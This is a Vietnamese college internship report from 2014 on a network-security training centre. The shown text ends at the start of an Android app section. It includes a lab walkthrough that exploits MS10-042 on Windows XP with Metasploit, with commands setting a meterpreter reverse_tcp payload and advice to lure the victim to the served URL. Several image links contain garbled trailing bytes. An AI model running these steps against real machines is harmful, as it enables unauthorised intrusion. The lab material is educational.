Bao cao thuc tap tot nghiep

BỘ CÔNG THƯƠNG

TRƯỜNG CAO ĐẲNG KỸ THUẬT CAO THẮNG

KHOA ĐIỆN TỬ - TIN HỌC

….. …..

BÁO CÁO

THỰC TẬP TỐT NGHIỆP

TẠI : 92 Nguyễn Đình Chiểu, phường Đa Kao, Q1

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG

& AN NINH MẠNG QUỐC TẾ ATHENA GVHD: Nguyễn Bá Phúc

CBHD: Võ Đỗ Thắng

ĐT (CBHD): 094 323 0099

SVTH: Nguyễn Minh Tân

MSSV : 306111350

LỚP: CĐTH11C

Báo cáo thực tập tốt nghiệp

TP.HỒ CHÍ MINH, ngày 21 tháng 03 năm 2014

LỜI CẢM ƠN

Em xin chân thành cảm ơn trường Cao Đẳng Kỹ Thuật Cao Thắng và Khoa

Điện Tử -Tin Học đã tạo điều kiện cho em hoàn thành tốt đợt thực tập tốt nghiệp

này. Em xin chân thành cảm ơn Ban giám đốc Trung Tâm Đào Tạo Quản Trị Mạng

& An Ninh Mạng Quốc Tế ATHENA, thầy Võ Đỗ Thắng và toàn thể các anh chị

trong công ty đã tận tình giúp đỡ em trong thời gian thực tập vừa qua. Trong đợt

thực tập này đã cho em những kinh nghiệm quý báo.Những kinh nghiệm đó sẽ giúp

cho em hoàn hiện hơn trong môi trường làm việc sau này.

Em cũng xin chân thành cảm ơnquý Thầy Cô trong Khoa đã tận tình giảng

dạy trang bị cho em những kiến thức cần thiết trong thời gian qua .

Mặc dù em đã cố hoàn thành báo cáo thực tập tốt nghiệp với tất cả nỗ lực của

bản thân, nhưng do trình độ hiểu biết và kinh nghiệm thực tế chắc chắn không tránh

khỏi những thiếu sót nhất định, rất mong nhận được sự cảm thông, chia sẻ và tận

tình để em hoàn thành bản báo cáo thực tập tốt nghiệp tốt hơn.

Một lần nữa em xin chân thành cảm ơn,

HCM, Ngày 21Tháng 3 Năm 2014

Sinh viên thực hiện:

Nguyễn Minh Tan

NGUYỄN MINH TÂN 2


LỜI MỞ ĐẦU

Là sinh viên năm cuối của trường Cao Đẳng Kỹ Thuật Cao Thắng, sau 3 năm

ngồi trên ghế nhà trường và được sự dẫn dắt tận tình của các Thầy Cô, em cũng như

các bạn sinh viên khác đã dần trưởng thành hơn và có kiến thức sâu rộng hơn. Để

những kiến thức này có ích hơn, không chỉ là kiến thức suôngvà được thực hành

nhiều hơn thì việc đi vào thực tập trong môi trường các doanh nghiệp là rất cần thiết

đối với em cũng như các bạn sinh viên khác.Qua thời gian thực tập này có thể giúp

cho em vận dụng những kiến thức mà mình đã được học vào thực tế. Từ đó giúp

cho em có thể nâng cao được năng lực thực hành của mình.

Nhận thức được tầm quan trọng của việc thực tập, nhà trường và Khoa Điện

Tử -Tin Học đã tạo điều kiện cho chúng em được đi thực tập tại các doanh nghiệp

trước khi ra trường.

Được sự đồng ýcủa nhà trường và sự giúp đỡ của ban lãnh đạo Trung Tâm

Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA đã giúp em hoàn

thành tốt đợt thực tập tốt nghiệp này.

Trong thời gian thực tập tại công ty,em đã cố gắng tìm hiểu và nghiên cứu

các vấn đề để hoàn thành nhiệm vụ về nội dung đấu giá dự án. Báo cáo này là tổng

hợp những hiểu biết chung của em về tình hình hoạt động, sản xuất kinh doanh

cũng như những gì em được giao nhiệm vụ tại công ty.

Qua đợt thực tập tìm hiểu các vấn đề, các mặt hoạt động và sản xuất kinh

doanh của công ty nhằm cũng cố và bổ sung kiến thức thực tế, hoàn thiện hơn về

kiến thức mà em đã được học tại trường.Trong quá trình thực tập tại công ty em đã

được trao dồi thêm kiến thức và hiểu biết hơn về môi trường làm việc bên ngoài,

giúp chúng em không bị bở ngở khi ra trường đi làm sau này.



NHẬN XÉT CỦA KHOA..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....



..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

NHẬN XÉT CỦA ĐƠN VỊ THỰC TẬP



..........................................................................................................

..........................................................................................................

..........

..........................................................................................................

.....

..........................................................................................................

..........................................................................................................

..........................................................................................................

...............

..........................................................................................................

.....

..........................................................................................................

..........................................................................................................

..........................................................................................................

..........................................................................................................

....................

..........................................................................................................

.....

..........................................................................................................

..........................................................................................................

..........................................................................................................

...............

..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....



..........................................................................................................

.....

..........................................................................................................

.....

..........................................................................................................

.....

MỤC LỤCCHƯƠNG 1: GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP............................................7

1. Thông tin về đơn vị thực tập:...............................................................................72. Quá trình hình thành và phát triển.......................................................................73. Lỉnh vực hoạt động chính....................................................................................74. Phương châm kinh doanh của Trung Tâm...........................................................85. Đội ngũ Giảng Viên.............................................................................................86. Cơ sở vật chất......................................................................................................97. Dịch vụ hỗ trợ......................................................................................................98. ...........................................................................................................................13

CHƯƠNG 2 : NỘI DUNG CÔNG VIỆC THỰC TẬP TẠI CÔNG TY.......................15PHẦN A: THAM GIA LỚP SYSTEM HACKING (21-21/02/2014).........................161. Tìm Hiểu Và Cài Đặt Backtrack5 Trên Máy Ảo Vmware................................162. Live DVD..........................................................................................................163. Install.................................................................................................................164. Demo sử dụng BackTrack5 khai thác lỗi MS10_042 trên WindowsXP...........24PHẦN B: NHẬN ĐỀ TÀI THỰC TẬP: NGHIÊN CỨU VÀ XÂY DỰNG ỨNG DỤNG TÌM ĐỊA ĐIỂM PHÒNG KHÁM BỆNH TRÊN THIẾT BỊ DI ĐỘNG (ANDROID).................................................................................................................291. Sơ lược về hệ điều hành Android......................................................................292. Hướng dẫn cài đặt Android với Eclipse:...........................................................323. Tích hợp Android SDK vào Eclipse:.................................................................344. Android Virtual Device:....................................................................................365. Debug cho ứng dụng Android:..........................................................................386. File Explorer của Android:................................................................................397. Tạo trang php.....................................................................................................41

CHƯƠNG 3: TỔNG KẾT.................................................................................................431. Những kết quả đạt được:....................................................................................432. Bài học kinh nghiệm cho bản thân:...................................................................433. Những điều chưa đạt được:................................................................................44



CHƯƠNG 1: GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP1. Thông tin về đơn vị thực tập:

- Tên công ty: Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế

Athena.

- Địa chỉ:

+ Cơ sở 1: 92 Nguyễn Đình Chiểu, phường Đa Kao, Q1,Tp.HCM

+ Cơ sở 2: 2 Bis Đinh Tiên Hoàng, phường Đa Kao, Q1,Tp.HCM

- Điện Thoại : (08)38244041

- Email: [email protected] - [email protected]

- Web:www.athena.edu.vn

- Logo công ty :

2. Quá trình hình thành

và phát triển

Trung Tâm Đào Tạo Quản Trị

Mạng & An Ninh Mạng Quốc

Tế ATHENA được thành lập

từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt

huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần vào công cuộc

thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần

phát triển nước nhà .


mailto:[email protected]

http://www.athena.edu.vn/


3. Lỉnh vực hoạt động chính

Trung tâm đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an

ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng

như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trung tâm

ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng

của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ

quan chính phủ, tổ chức tài chính..

Sau gần 10 năm hoạt động, nhiều học viên tốt nghiệp trung tâm ATHENA đã là

chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ

ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông

Tin Truyền Thông các tỉnh, bưu điện các tỉnh,,.

Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp

tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố

Hồ CHính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính

Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,......

4. Phương châm kinh doanh của Trung Tâm

Mang đến cho khách hàng môi trường học tập và nền kiến thức tốt nhất là động lực

hoạt động của Trung Tâm.

5. Đội ngũ Giảng Viên

Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học

hàng đầu trong nước .... Tất cả giảng viên ATHENA đều phải có các chứng chỉ

quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc

tế (Microsoft Certified Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ

điều kiện tham gia giảng dạy tại trung tâm ATHENA



Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức

công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và truyền

đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA.

6. Cơ sở vật chất

- Thiết bị đầy đủ và hiện đại

- Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với

những công nghệ mới nhất.

- Phòng máy rộng rãi, thoáng mát

7. Dịch vụ hỗ trợ

- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn.

- Giới thiệu việc làm cho mọi học viên.

- Thực tập có lương cho học viên khá giỏi.

- Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí,

không giới hạn thời gian.

- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến

máy tính, mạng máy tính, bảo mật mạng.

- Hỗ trợ thi Chứng chỉ Quốc tế.



Trung Tâm ATHENA - 2 Bis Đinh Tiên Hoàng , DaKao, Q1 , Tp HCM



Trung tâm ATHENA - 92 Nguyễn Đình Chiểu ,DaKao, Q1 , Tp HCM

Khóa học quản trị hệ thống mạng Cisco cho ngân hàng MHB Bank





8.



Phát chứng chỉ hoàn thành khóa học



CHƯƠNG 2 : NỘI DUNG CÔNG VIỆC THỰC TẬP TẠI CÔNG TY

Nội dung bao gồm:

- Thời gian thực tập: 10/2/2014 – 22/3/2014, 1 tuần thực tập 3 buổi (thứ 2, 4, 6 buổi sáng(9h – 12h)).

Phần A: Tham gia lớp System Hacking (21-21/02/2014).

- Yêu cầu: Tìm hiểu và cài đặt Backtrack5, dùng Backtrack5 khai thác lỗi trên hê điều hành Windows XP.

Phần B: Nhận đề tài thực tập: Nghiên cứu và xây dựng ứng dụng tìm địa điểm phòng khám bệnh trên thiết bị di động (Android).

- Số thành viên trong nhóm: 2

- Yêu cầu:o Quản lý thông tin: tên bác sỹ, chuyên khoa, số nhà, đường, quận, tỉnh,

thành phố.o Cho phép người dung (bệnh nhân) sử dụng tablet, smatphone, IOS….

Để truy cập thông tin qua internet.o Sử dụng php & mysql. Tùy biến để các thiết bị với hệ điều hành có

thể truy cập.o Triển khai phần mềm trên server VPS.

- Nhận tài liệu:o Sách lap hướng dẫn php&mysql của Athena.

o Bộ CD hướng dẫn cài đặt Android của Athena.

o Chuẩn bị VPS (thuê) để triển khai ứng dụng trên Internet.



PHẦN A: THAM GIA LỚP SYSTEM HACKING (21-21/02/2014).

1. Tìm Hiểu Và Cài Đặt Backtrack5 Trên Máy Ảo Vmware

BackTrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử

nghiệm thâm nhập. Trong các định dạng Live DVD, chúng ta sử dụng có thể

Backtrack trực tiếp từ đĩa DVD mà không cần cài nó vào máy của chúng ta.

Backtrack cũng có thể được cài đặt vào ổ cứng và sử dụng như một hệ điều hành.

Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập

thử nghiệm – IWHAX, WHOPPIX, và Auditor.

2. Live DVD

Nếu chúng ta muốn sử dụng Backtrack mà không cần cài nó vào ổ cứng, chúng

ta có thể ghi tập tin ảnh ISO vào đĩa DVD, và khởi động máy tính của chúng ta

với DVD. Backtrack sau đó sẽ chạy từ đĩa DVD. Lợi thế của việc sử dụng

Backtrack là một DVD Live là nó là rất dễ dàng để làm và chúng ta không cần

phải gây rối với cấu hình máy hiện tại của chúng ta.Tuy nhiên, phương pháp này

cũng có một số nhược điểm. Backtrack có thể không làm việc với phần

cứng, và thay đổi cấu hình nào được thực hiện trên phần cứng để làm việc sẽ

không được lưu với đĩa DVD Live. Ngoài ra, nó là chậm, vì máy tính cần phải tải

các chương trình từ đĩa DVD.

3. Install

a) Cài đặt trong máy thật:

Chúng ta cần chuẩn bị một phân vùng để cài đặt Backtrack. Sau đó chạy

Backtrack Live DVD. Khi gặp màn hình login.

Ta sử dụng username là root, pass là toor. Sau đó để vào chế độ đồ họa, ta gõ

startx và ta sẽ vào chế độ đồ họa của Backtrack 5.

Để cài đặt Backtrack 5 đến đĩa cứng ta chọn tập tin có tên install.sh trên desktop

và tiến hành cài đặt. Tuy nhiên, nếu không thể tìm thấy tập tin, chúng ta có thể sử

dụng ubiquity để cài đặt. Để sử dụng ubiquity, ta mở Terminal gõ ubiquity.9

Sau đó cửa sổ cài đặt sẽ hiển thị. Sau đó trả lời 1 số câu hỏi như thành phố chúng



tađang sống, keyboard layout, phân vùng ổ đĩa cài đặt,… Sau đó tiến hành cài đặt.

b) Cài đặt trong máy ảo:

Điểm thuận lợi là ta không cần chuẩn bị một phân vùng cho Backtrack, và sử

dụng đồng thời một OS khác. Khuyết điểm là tốc độ chậm, không dùng được

wireless trừ USB wireless.

Ta có thể có thể sử dụng file VMWare được cung cấp bởi BackTrack. Từ đây

chúng ta có BackTrack trên máy ảo thật dễ dàng và nhanh chóng. Cấu hình trong

file VMWare là memory 768MB, hardisk :30GB, Network:NAT. Để sử dụng được

card mạng thật, ta phải chọn Netword là Briged.

Dưới đây làm một số hình ảnh khi cài BackTrack trên máy ảo VMWare.

Tạo một máy ảo mới và cho đia BackTrack vào.


http://1.bp.blogspot.com/-knbF9bD-Vzs/UbdbkTWhirI/AAAAAAAAAEY/w3SvvVWAj2U/s1600/1.png%00%E5%A1%B9%EF%92%81%E1%B4%BB%E4%A1%BF%E2%B2%AF%E5%B6%82%E8%97%84%E6%8C%A7%00%00%EA%AE%A5


Giao diện khởi động của BackTrack


http://4.bp.blogspot.com/-3rHYHf0xUtM/UbdeE-jC1oI/AAAAAAAAAE8/OVZvRfS9krs/s1600/2.png%00%E5%A1%B9%EF%92%81%E1%B4%BB%E4%A1%BF%E2%B2%AF%E5%B6%82%E8%97%84%E6%8C%A7%00%00%EA%AE%A5

http://1.bp.blogspot.com/-E7mAUGwhd7o/UbdgaWPCh6I/AAAAAAAAAFU/w9OkooR-aog/s1600/3.png%00%E5%A1%B9%EF%92%81%E1%B4%BB%E4%A1%BF%E2%B2%AF%E5%B6%82%E8%97%84%E6%8C%A7%00%00%EA%AE%A5


Gõ startx để vào chế độ đồ họa trong BackTrack

Để cài đặt, click chọn vào file Install BackTrack trên màn hình Desktop


http://1.bp.blogspot.com/-dwU5cC2bLuk/UbdhCk4PWKI/AAAAAAAAAFc/KXLiv2ybojs/s1600/4.png%00%E5%A1%B9%EF%92%81%E1%B4%BB%E4%A1%BF%E2%B2%AF%E5%B6%82%E8%97%84%E6%8C%A7%00%00%EA%AE%A5

http://2.bp.blogspot.com/-VeoPCw6Cv3g/Ubdhq3Ox3DI/AAAAAAAAAFo/jGLfIwN-FKc/s1600/5.png%00%E5%A1%B9%EF%92%81%E1%B4%BB%E4%A1%BF%E2%B2%AF%E5%B6%82%E8%97%84%E6%8C%A7%00%00%EA%AE%A5


Chọn ngôn ngữ, chọn Forward để tiếp tục


http://4.bp.blogspot.com/-1KRZ_CIOW5Y/UbdiHyJGcFI/AAAAAAAAAFw/ZMdw3oen8NQ/s1600/6.png%00%E5%A1%B9%EF%92%81%E1%B4%BB%E4%A1%BF%E2%B2%AF%E5%B6%82%E8%97%84%E6%8C%A7%00%00%EA%AE%A5


Chọn nơi ở của chúng ta, chọn Forward để tiếp tục


http://3.bp.blogspot.com/-E1nOnNQYIBA/UbdiwmYWEqI/AAAAAAAAAF8/nn6wNr-3TWA/s1600/7.png%00%E5%A1%B9%EF%92%81%E1%B4%BB%E4%A1%BF%E2%B2%AF%E5%B6%82%E8%97%84%E6%8C%A7%00%00%EA%AE%A5


Chọn ngôn ngữ bàn phím, chọn Forward để tiếp tục

Chọn phân vùng để cài.


http://2.bp.blogspot.com/-USLe1GCVwP4/UbdjKSt6rrI/AAAAAAAAAGE/vX-7LzfqKXA/s1600/8.png%00%E5%A1%B9%EF%92%81%E1%B4%BB%E4%A1%BF%E2%B2%AF%E5%B6%82%E8%97%84%E6%8C%A7%00%00%EA%AE%A5

http://2.bp.blogspot.com/-PjP-t36f3IE/UbdjnYOhQ7I/AAAAAAAAAGM/MwPMzzF5rRA/s1600/9.png%00%E5%A1%B9%EF%92%81%E1%B4%BB%E4%A1%BF%E2%B2%AF%E5%B6%82%E8%97%84%E6%8C%A7%00%00%EA%AE%A5


Nhấn Install để bắt đầu cài

Quá trình cài đã bắt đầu.


http://4.bp.blogspot.com/-VEqiQGsirqg/UbdkJAEaVDI/AAAAAAAAAGU/eOgggP2pkM8/s1600/10.png%00%E5%A1%B9%EF%92%81%E1%B4%BB%E4%A1%BF%E2%B2%AF%E5%B6%82%E8%97%84%E6%8C%A7%00%00%EA%AE%A5

http://4.bp.blogspot.com/-sSZwBYKqCnI/UbdlGdHwMJI/AAAAAAAAAGk/2npSmm7YSXs/s1600/11.png%00%E5%A1%B9%EF%92%81%E1%B4%BB%E4%A1%BF%E2%B2%AF%E5%B6%82%E8%97%84%E6%8C%A7%00%00%EA%AE%A5


Sau khi hoàn tất, chỉ việc khởi động lại là xong.4. Demo sử dụng BackTrack5 khai thác lỗi MS10_042 trên

WindowsXP

Tiêu đềLỗ hổng bảo mật trong Help and Support Center Could có thể cho phép thực hiện mã lệnh từ xa (2229593)

Thực hiện

Cập nhật bảo mật này giải quyết lỗ hổng công khai trong Windows Help and Support Center được cung cấp với các phiên bản của Windows XP và Windows Server 2003. Lỗ hổng này có thể cho phép thực thi mã từ xa nếu người dùng xem một trang web đặc biệt qua một trình duyệt web hoặc nhấp vào một liên kết đặc biệt trong một thông báo e-mail.Bản cập nhật bảo mật xác định các lỗ hổng bằng cách thay đổi cách thức mà dữ liệu được xác nhận khi được truyền cho Windows Help and Support Center.Cập nhật bảo mật này cũng xác định các lỗ hổng được mô tả đầu tiên trong Microsoft Security Advisory 2219475.

Các phần mềm bị ảnh hưởng

Cập nhật bảo mật này được đánh giá là Nghiêm Trọng cho tất cả các phiên bản Microsoft Windows XP, và đánh giá mức độ Thấp cho tất cả các phiên bản Windows Server 2003

Cơ chế ảnh hưởng• Cố truy cập thông qua trang web giả mạo• Cố truy cập thông qua email giả mạo.

Hình thức giảm nhẹ • Người dùng phải bị lừa để truy cập vào trang web xấu.


http://www.microsoft.com/technet/security/advisory/2219475.mspx

http://4.bp.blogspot.com/-rpmJy5LDZ5w/UbdlpLfSIUI/AAAAAAAAAGs/_cdI7_0PVw8/s1600/12.png%00%E5%A1%B9%EF%92%81%E1%B4%BB%E4%A1%BF%E2%B2%AF%E5%B6%82%E8%97%84%E6%8C%A7%00%00%EA%AE%A5


ảnh hưởng

• Có thể không được khai thác tự động thông qua e-mail, bởi vì một người sử dụng phải mở một file đính kèm được gửi trong một tin nhắn e-mail.• Một kẻ tấn công đã khai thác thành công lỗ hổng này có thể đạt được quyền sử dụng giống như người dùng trong hệ thống mạng nội bộ. Người dùng có ít quyền truy cập hệ thống có thể ít bị ảnh hưởng hơn so với người dùng có quyền truy cập quản trị hệ thống.

Yêu cầu khởi động lại Có thể yêu cầu khởi động lại

Cập nhật bảo mật nào được thay thế bởi cập nhật này

Không có

Thông tin chi tiếthttp://www.microsoft.com/technet/security/bulletin/MS10-042.mspx

1. Mô hình bài Lab:

Máy Hacker:Hệ điều hành: Sử dụng Backtrack 5IP: 192.168.132.137

Máy nạn nhân:Hệ điều hành: Sử dụng Windows XPIP: 192.168.132.138

2. Cách khai thác:

Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsoleTừ dấu nhắc sử dụng lệnh:msf > search ms10_042copy đường dẫn, enter gõ use “dán đường dẫn vào”msf > use exploit/windows/browser/ms10_042_helpctr_xss_cmd_execGõ show options để thấy các options của lệnh.msf exploit(ms10_042_helpctr_xss_cmd_exec) > show options


http://www.microsoft.com/technet/security/bulletin/MS10-042.mspx

http://www.microsoft.com/technet/security/bulletin/MS10-042.mspx

http://1.bp.blogspot.com/-ghFczrYFMXo/UsJHZYm_AsI/AAAAAAAAAdw/7QB7-Bhc5N4/s1600/ms10_042_0.jpg


Lần lượt gõ các lệnh sau:msf exploit(ms10_042_helpctr_xss_cmd_exec) > set SRVHOST 192.168.132.137msf exploit(ms10_042_helpctr_xss_cmd_exec) > set PAYLOAD windows/meterpreter/reverse_tcpmsf exploit(ms10_042_helpctr_xss_cmd_exec) > set LHOST 192.168.132.137msf exploit(ms10_042_helpctr_xss_cmd_exec) > exploit

Sau khi gõ lệnh exploit để khai thác lỗi ta sẽ thấy chương trình đưa ra cho ta 1 URL website, lúc này chỉ cần dụ nạn nhân nhập vào URL này, ta sẽ tấn công được máy nạn nhân. Ở đây URL là:http://192.168.132.137:80/


http://4.bp.blogspot.com/-jBIMiL0l02M/UsJGTVVmZcI/AAAAAAAAAc8/G6p4xw4a4XU/s1600/ms10_042_1.jpg

http://3.bp.blogspot.com/-Gzzp8J6djbI/UsJGTYKLi-I/AAAAAAAAAc4/ENFwWSBhwkM/s1600/ms10_042_2.jpg


Chương trình này sẽ dựa vào lỗi và sẽ mở ra Help and Support Center của máy nạn nhân

Backtrack gửi mã độc qua cho máy nạn nhân

Gõ lệnh sessions để coi Session đang thực hiện, ta thấy có 1 Session đang thực hiện tấn công tới máy 192.168.132.138 trên port 1207Gõ lệnh sessions –i 1Ta đã tấn công được vào máy nạn nhân, ta thấy máy nạn nhân là Windows XP 32 bit.


http://1.bp.blogspot.com/-lY02Cx2Bgd0/UsJGTMW5X-I/AAAAAAAAAc0/TNVdvkbJ97o/s1600/ms10_042_3.jpg

http://3.bp.blogspot.com/-b5v-Dnk9cUU/UsJGT5bJq_I/AAAAAAAAAdI/SkEl6PS_Crg/s1600/ms10_042_4.jpg

http://2.bp.blogspot.com/-BehPlFwnJyU/UsJGUHTtNRI/AAAAAAAAAdY/XdDGYwQHqWg/s1600/ms10_042_5.jpg


Xem thông tin ổ đĩa máy nạn nhân, tạo thử thư mục

OK, ta đã thâm nhập thành công!.


http://3.bp.blogspot.com/-UdA0IRuqLys/UsJGUVxVkaI/AAAAAAAAAdQ/MowpymCEj5c/s1600/ms10_042_6.jpg

http://3.bp.blogspot.com/-mvZ_N2Zlqy8/UsJGUwaQuEI/AAAAAAAAAdc/LB5eglG29Wo/s1600/ms10_042_7.jpg


PHẦN B: NHẬN ĐỀ TÀI THỰC TẬP: NGHIÊN CỨU VÀ XÂY DỰNG ỨNG

DỤNG TÌM ĐỊA ĐIỂM PHÒNG KHÁM BỆNH TRÊN THIẾT BỊ DI ĐỘNG

(ANDROID).

1. Sơ lược về hệ điều hành Android

Android là hệ điều hành trên điện thoại di động (và hiện nay là cả trên một số đầu phát HD, HD Player, TV) phát triển bởi Google và dựa trên nền tảng Linux. Trước đây, Android được phát triển bởi công ty liên hợp Android ( sau đó được Google mua lại vào năm 2005).Các nhà phát triển viết ứng dụng cho Android dựa trên ngôn ngữ Java. Sự ra mắt của Android vào ngày 5 tháng 11 năm 2007 gắn với sự thành lập của liên minh thiết bị cầm tay mã nguồn mở, bao gồm 78 công ty phần cứng, phần mềm và viễn thông nhằm mục đính tạo nên một chuẩn mở cho điện thoại di động trong tương lai.

Lịch sử phát triển Anroid

Tháng 7 năm 2005, Google mua lại Android, Inc., một công ty nhỏ mới thành lập

có trụ sở ở Palo Alto, California, Mỹ. Những nhà đồng sáng lập của Android

chuyển sang làm việc tại Google gồm có Andy Rubin (đồng sáng lập công ty

Danger), Rich Miner (đồng sáng lập công ty Wildfire Communications), Nick Sears

(từng là phó chủ tịch của T-Mobile), và Chris White (trưởng nhóm thiết kế và phát

triển giao diện tại WebTV). Khi đó, có rất ít thông tin về các công việc của

Android, ngoại trừ việc họ đang phát triển phần mềm cho điện thoại di động. Điều


http://www.vietnamandroid.com/wp-content/uploads/2010/03/android_logo.jpg


này tạo những tin đồn về việc Google có ý định bước vào thị trường điện thoại di

động.

Tại Google, nhóm do Rubin đứng đầu đã phát triển một nền tảng thiết bị di động

dựa trên hạt nhân Linux, được họ tiếp thị đến các nhà sản xuất thiết bị cầm tay và

các nhà mạng trên những tiền đề về việc cung cấp một hệ thống mềm dẻo, có khả

năng nâng cấp mở rộng cao.[cần dẫn nguồn] Một số nguồn tin cho biết trước đó

Google đã lên danh sách các thành phần phần cứng và các đối tác phần mềm, đồng

thời ra hiệu với các nhà mạng rằng họ sẵn sàng hợp tác ở nhiều cấp độ khác nhau.

Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động

xuất hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú

thích rằng Google muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện

thoại di động và họ đang nỗ lực làm việc để thực hiện điều này. Các phương tiện

truyền thông in và online cũng sớm có bài viết về những tin đồn cho rằng Google

đang phát triển một thiết bị cầm tay mang thương hiệu Google. Và lại càng có nhiều

suy đoán sau bài viết về việc Google đang định nghĩa các đặc tả công nghệ và trình

diễn các mẫu thử với các nhà sản xuất điện thoại di động và nhà mạng.

Tính Năng Mở của hệ điều hành Android là gì?

Android được xây dựng để cho phép các nhà phát triển để tạo ra các ứng dụng di

động hấp dẫn tận dụng tất cả một chiếc điện thoại đã cung cấp. Nó được xây dựng

để được thực sự mở. Ví dụ, một ứng dụng có thể kêu gọi bất kỳ chức năng lõi của

điện thoại như thực hiện cuộc gọi, gửi tin nhắn văn bản, hoặc bằng cách sử dụng

máy ảnh, cho phép các nhà phát triển để tạo ra phong phú hơn và nhiều hơn nữa

những kinh nghiệm cố kết cho người dùng. Android được xây dựng trên mở Linux

Kernel. Hơn nữa, nó sử dụng một máy ảo tuỳ chỉnh được thiết kế để tối ưu hóa bộ

nhớ và tài nguyên phần cứng trong một môi trường di động. Android là mã nguồn

mở, nó có thể được liberally mở rộng. Nền tảng này sẽ tiếp tục tiến triển như cộng

đồng nhà phát triển công việc cùng nhau để xây dựng các ứng dụng di động sáng

tạo.

Tất cả các ứng dụng có thể được tạo ra cho Android?



Android không phân biệt giữa các ứng dụng lõi của điện thoại và các ứng dụng của

bên thứ ba. Họ tất cả có thể được xây dựng để có thể truy cập bằng khả năng của

một người cung cấp cho người sử dụng điện thoại với một dải rộng các ứng dụng và

dịch vụ. Với các thiết bị xây dựng trên Hệ điều hành Android, người dùng có thể

hoàn toàn thích ứng với điện thoại đến lợi ích của họ. Họ có thể trao đổi trên màn

hình của điện thoại, những phong cách của dialer, hoặc bất kỳ ứng dụng. Họ thậm

chí có thể hướng dẫn điện thoại của họ để sử dụng hình ảnh ưa thích của họ xem

các ứng dụng để xử lý xem tất cả các hình ảnh.

Phá bỏ các rào cản ứng dụng của Android?

Android phá bỏ rào cản để xây dựng các ứng dụng mới và sáng tạo. Ví dụ, một nhà

phát triển có thể kết hợp thông tin từ các trang web với dữ liệu trên điện thoại di

động của một cá nhân – ví dụ như địa chỉ liên hệ của người dùng, lịch, hoặc vị trí

địa lý – để cung cấp một trải nghiệm người dùng có liên quan hơn. Với Android,

một nhà phát triển có thể xây dựng một ứng dụng cho phép người dùng xem vị trí

của bạn bè của họ và được cảnh báo khi họ đang có trong vùng phụ cận cho họ một

cơ hội để kết nối.

Với Android tốc độ nhanh & phát triển ứng dụng dễ dàng

Android cung cấp truy cập đến một loạt các thư viện công cụ hữu ích và có thể

được sử dụng để xây dựng các ứng dụng phong phú. Ví dụ, Android cho phép các

nhà phát triển để có được vị trí của điện thoại, và cho phép các thiết bị để giao tiếp

với nhau tạo điều kiện cho đồng đẳng rich-to-peer ứng dụng xã hội. Ngoài ra,

Android bao gồm một tập hợp đầy đủ công cụ đã được xây dựng từ mặt đất lên

cùng với việc cung cấp nền tảng phát triển, với năng suất cao và cái nhìn sâu vào

các ứng dụng của họ.

Phát triển Android ROM

Rất nhiều nhà phát triển hệ điều hành Android đã vào cuộc và các ROM cho

Android độc đáo được ra đời với nhiều tích năng nổi trội được tích hợp và đầy sang



tạo

Danh sách các nhà phát triển ROM nổi bật:

1. ahmgsk

2. Amon_RA

3. Benbuchacher

4. BH_MAN

5. HTCClay

6. eViL_D

7. domenukk

8. OpenTeam

Ngoài ra cò hàng trăm nhà phát triển ROM đang ngày đêm làm việc cật lực để đưa

ra sản phẩm của chính mình.

Phần mềm điện thoại Android

Phải nói rằng Android ra đời đã mang lại cho người dùng điện thoại sự cảm nhận

khác biệt về 1 chiếc Smartphone, chưa đầy 2 năm kho phần mềm cho Android đã

lên đến còn số hơn 30 nghìn ứng dụng.

2. Hướng dẫn cài đặt Android với Eclipse:

